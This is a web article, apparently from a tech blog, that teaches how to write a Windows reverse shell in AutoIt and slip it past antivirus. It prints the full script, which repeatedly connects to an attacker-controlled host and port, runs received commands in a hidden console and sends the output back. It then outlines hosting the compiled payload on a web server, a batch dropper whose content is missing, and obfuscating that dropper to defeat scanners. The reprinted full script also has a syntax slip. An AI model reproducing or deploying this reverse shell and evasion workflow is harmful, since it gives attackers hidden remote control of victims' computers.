8.2 C
London
Monday, April 22, 2024

How to Hack Bypass AV into Windows with Autoit

- Advertisement -spot_imgspot_img
- Advertisement -spot_imgspot_img

 

1. What is Autoit programming language?

AutoIt is a programming language for the Windows operating system, primarily used to automate tasks. With simple syntax and strong integration with Windows, the AutoIt language is a flexible tool for automated scripting, from software installation to user interface interaction. Known for its stability and high compatibility, the AutoIt programming language is a popular choice among Windows users and software developers.

2. How Hackers Bypass AV Infiltrate Windows with Autoit

Hackers penetrate our computers in many different ways. But in this article, I will mention the Reverse Shell technique, which is a popular technique for network intrusion, where the compromised computer creates a connection with the target computer. of the attacker. This allows attackers to conduct remote intrusions, including installing malicious code, stealing data, modifying system configuration, and more. This technique is mainly used to exploit the reliability of the network system and create a virtual window to perform intrusion activities.

First of all, I will create a file called ReverseShell.au3 and the code starts by declaring the necessary libraries from AutoIt

#include <AutoItConstants.au3>
#include <GUIConstantsEx.au3>
#include <MsgBoxConstants.au3>

Next, the IP address and port of the control server are set in global variables. In this case, the hacker machine is located with IP address 127.0.0.1 (localhost) and port 4444

Global $host = "127.0.0.1"
Global $port = 4444

Define a global variable to store the current path of the victim machine

Global $currentDir = @WorkingDir

In an infinite loop, this code will check to see if the victim’s machine is accessible to the hacker’s machine, using the Ping function. If the victim machine is accessible, it will try to connect to the hacker’s computer via TCP protocol. If the connection is successful, the loop exits. And vice versa, if the connection fails, the code will continue to run until the connection is successful

While 1
    If Ping($host, 250) Then ; Check if the server is reachable
        TCPStartup()
        $socket = TCPConnect($host, $port)
        If $socket <> -1 Then ; Check if the connection is successful
            ExitLoop ; Exit the loop if the connection is established
        EndIf
        TCPCloseSocket($socket)
        TCPShutdown()
    EndIf
    Sleep(1000) ; Wait for 1 second before retrying
WEnd

After the victim’s computer connects to the hacker’s computer, the victim’s computer will send the current path to the hacker’s computer

TCPSend($socket, $currentDir & "> ")

Once connected, the victim’s computer continues to listen to receive commands from the hacker’s computer. If the received command begins with “cd”, it executes a directory change command. If not, it executes the command on the operating system and sends the results to the hacker’s machine

While 1
    If @error Then ExitLoop
    $recv = TCPRecv($socket, 1024)
    If $recv <> "" Then
        If StringLeft($recv, 3) = "cd " Then ; Check if the command is a change directory command
            $dirToChange = StringTrimLeft($recv, 3)
            $dirToChange = StringStripWS($dirToChange, 3) ; Remove leading/trailing whitespaces
            If FileChangeDir($dirToChange) Then
                $currentDir = @WorkingDir
                TCPSend($socket, $currentDir & "> ")
            Else
                TCPSend($socket, "[!] Failed to change directory" & @CRLF)
                TCPSend($socket, $currentDir & "> ")
            EndIf
        Else
            $cmd = Run(@ComSpec & " /c " & $recv, "", @SW_HIDE, 2)
            $stdout = ""
            While @ComSpec & " /c " & $recv <> ""
                $line = StdoutRead($cmd)
                If @error Then ExitLoop
                $stdout &= $line
            WEnd
            $ret = TCPSend($socket, $stdout)
            TCPSend($socket, $currentDir & "> ")
            Sleep(500)
        EndIf
    EndIf
WEnd

After the hacker completes his purpose, the AutoIt code will close the TCP connection and turn off the TCP library

TCPCloseSocket($socket)
TCPShutdown()

Here is the entire code:

#include <AutoItConstants.au3>
#include <GUIConstantsEx.au3>
#include <MsgBoxConstants.au3>

Global $host = "127.0.0.1"
Global $port = 4444

Global $currentDir = @WorkingDir

While 1
    If Ping($host, 250) Then ; Check if the server is reachable
        TCPStartup()
        $socket = TCPConnect($host, $port)
        If $socket <> -1 Then ; Check if the connection is successful
            ExitLoop ; Exit the loop if the connection is established
        EndIf
        TCPCloseSocket($socket)
        TCPShutdown()
    EndIf
    Sleep(1000) ; Wait for 1 second before retrying
WEnd

TCPSend($socket, $currentDir & "> ")
While 1
    If @error Then ExitLoop
    $recv = TCPRecv($socket, 1024)
    If $recv <> "" Then
        If StringLeft($recv, 3) = "cd " Then ; Check if the command is a change directory command
            $dirToChange = StringTrimLeft($recv, 3)
            $dirToChange = StringStripWS($dirToChange, 3) ; Remove leading/trailing whitespaces
            If FileChangeDir($dirToChange) Then
                $currentDir = @WorkingDir
                TCPSend($socket, $currentDir & "> ")
            Else
                TCPSend($socket, "[!] Failed to change directory" & @CRLF
                TCPSend($socket, $currentDir & "> ")
            EndIf
        Else
            $cmd = Run(@ComSpec & " /c " & $recv, "", @SW_HIDE, 2)
            $stdout = ""
            While @ComSpec & " /c " & $recv <> ""
                $line = StdoutRead($cmd)
                If @error Then ExitLoop
                $stdout &= $line
            WEnd
            $ret = TCPSend($socket, $stdout)
            TCPSend($socket, $currentDir & "> ")
            Sleep(500)
        EndIf
    EndIf
WEnd

TCPCloseSocket($socket)
TCPShutdown()

Next, the hacker will compile the ReverseShell.au3 script into ReverseShell.a3x

>>  2 tips to restore open tabs when restarting Chrome

When the compilation process is completed, the hacker opens a web server to store the autoit.exe and ReverseShell.a3x files to prepare for the attack. And here I have prepared a Batch script called RS.bat with the following content:

Now I will go to the website https://www.batch-obfuscator.tk/ to encrypt this RS.bat file to bypass AntiVirus

Here are Virustotal’s scan results: https://www.virustotal.com/gui/file/e18726a16d26bd432fd422a6a34636d61cfea23fde3a79639bd0cabb548fbfee?nocache=1

Video demo:

0/5 (0 Reviews)
- Advertisement -spot_imgspot_img
Latest news
- Advertisement -spot_img
Related news
- Advertisement -spot_img

LEAVE A REPLY

Please enter your comment!
Please enter your name here